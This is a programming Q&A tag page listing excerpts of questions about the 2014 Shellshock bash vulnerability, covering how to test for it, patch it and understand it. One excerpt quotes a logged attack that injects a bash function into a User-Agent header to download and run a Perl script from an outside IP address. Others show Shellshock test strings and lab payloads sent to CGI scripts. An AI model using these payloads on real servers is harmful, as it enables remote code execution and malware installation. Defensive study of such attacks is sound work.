Questions tagged [shellshock-bash-bug]

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

For more information, see CVE-2014-6271 and CVE-2014-7169.

40 questions

2 votes, 1 answer

Does bash exploit (CVE-2014-6271) require terminal access to utilize?

With all the scare regarding CVE-2014-6271, I've found little concrete information regarding the vulnerability's surface area. In particular, does an individual require terminal access to execute this exploit? I am aware that CGI services that…
Justin Bell

2 votes, 1 answer

Impact of BASH bug on Azure Websites, Cloud Services and SQL Database?

Just been reading about this potentially serious Linux based bug. It would seem that Azure should be on the safe side, as being Windows based, and most likely quickly patched, as that is why we use Platform As A Service (PAAS). For anybody…
2 votes, 2 answers

How to check and upgrade Bash on FreeBSD - related to the Shellshock bug

I read the article A Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271) this morning when I came into work. I have updated Bash on most of my systems that I am responsible for, however, I was asked to…
Django Fett

1 vote, 1 answer

Non imported environment variable with shellshock fixed bash version

I have a simple bash script which modifies an environment variable that will be used by subsequent binary. Below my basic script: #!/bin/bash export DBROOT="NEW_DIRECTORY" export TERM=xterm su -c " " - omni DBROOT variable is used…
Mou

1 vote, 3 answers

Bash script does not ssh all the entries of a csv file

I am trying to patch a bunch of CentOS machines with the latest fix pack. I have the below bash script that takes a csv file as an input which has the ip address and password for those machines. The code works fine however, it would only work for the…
user3846091

1 vote, 3 answers

bash shellshock jurat Perl script

I saw the following line under /var/log/apache2/access_log: "GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\"" I…
wcochran

1 vote, 1 answer

Does using Python on OS X expose me to Shellshock?

Various outlets, along with Apple, are assuring OS X users that they are not at particular risk from the Shellshock bash exploit. However, I use Python frequently on my system and wonder if that would increase my risk; and whether there is anything…
orome

1 vote, 1 answer

Can someone explain how this "Shellshock" code works in shell

I read in the news that Shellshock is another bigger vulnerability after Heartbleed. The code to test if our Bash shell is vulnerable or not is: env X="() { :;} ; echo shellshock" /bin/sh -c "echo completed" In detail, how does this code exactly…
Jassi

1 vote, 2 answers

patching bash shell shock bug from source

I am running a non-standard version of Ubuntu and I tried to patch the shell shock bug by downloading and recompiling from the source, following the instructions from https://news.ycombinator.com/item?id=8364385 . After make install, running bash…
JRR

1 vote, 2 answers

The bash vulnerability CVE-2014-6271 . Can it affect my CGI perl scripts? How to understand this?

Yesterday the problem CVE-2014-6271 was reported which is the BASH Shellshock vulnerability. I am trying to understand if it can affect my server via my Perl CGI scripts. Can my code be affected in a malicious way - what would my code need to do to…
Roman Gelembjuk

1 vote, 3 answers

Strange Bash function export for the Shellshock bug

Why does the code date bash -c "date" declare -x date='() { echo today; }' #aka export date='() { echo today; }' date bash -c "date" print Wed Sep 24 22:01:50 CEST 2014 Wed Sep 24 22:01:50 CEST 2014 Wed Sep 24 22:01:50 CEST 2014 today ? Where (and…
clt60

0 votes, 1 answer

Why can't I get the ShellShock Bash bug to reproduce on Bash 4.2.0?

I am learning about the ShellShock vulnerability and I wanted to test older versions of Bash. I downloaded Bash 4.2 from GNU website. After extracting the content, I compiled it based on GNU guide like that: bash ./configure make After it finished…
E235

0 votes, 0 answers

How does echo; help in this context

The below line works just fine and gets the file- wget -U "() { :;}; echo; /bin/task1 hello" http://10.0.0.1:6262/cgi-bin/shellshock.cgi However, if I skip the "echo;", it throws 500 internal server error. wget -U "() { :;}; /bin/task1 hello"…
krishna

0 votes, 1 answer

Agent field is set but not run the function in shell shock

I try to solve seed lab shell shock vulnerability lab in that, I set the agent field by below command Curl -A "() {echo hello;}; Content_type: text/plain; echo; /bin/ls -l " http://localhost/cgi-bin/sample.cgi The output is still the hello word…
AliSafari186

0 votes, 1 answer

Why isn't my bash 4.1.2 package vulnerable to shellshock? Is my test wrong?

My Bash shell version is GNU bash, version 4.1.2(2)-release (x86_64-redhat-linux-gnu). I tested the shellshock bug by using the below command x='() { :;}; echo VULNERABLE' bash -c :. The VULNERABLE message was not printed back. I have read that the bug…
Jobs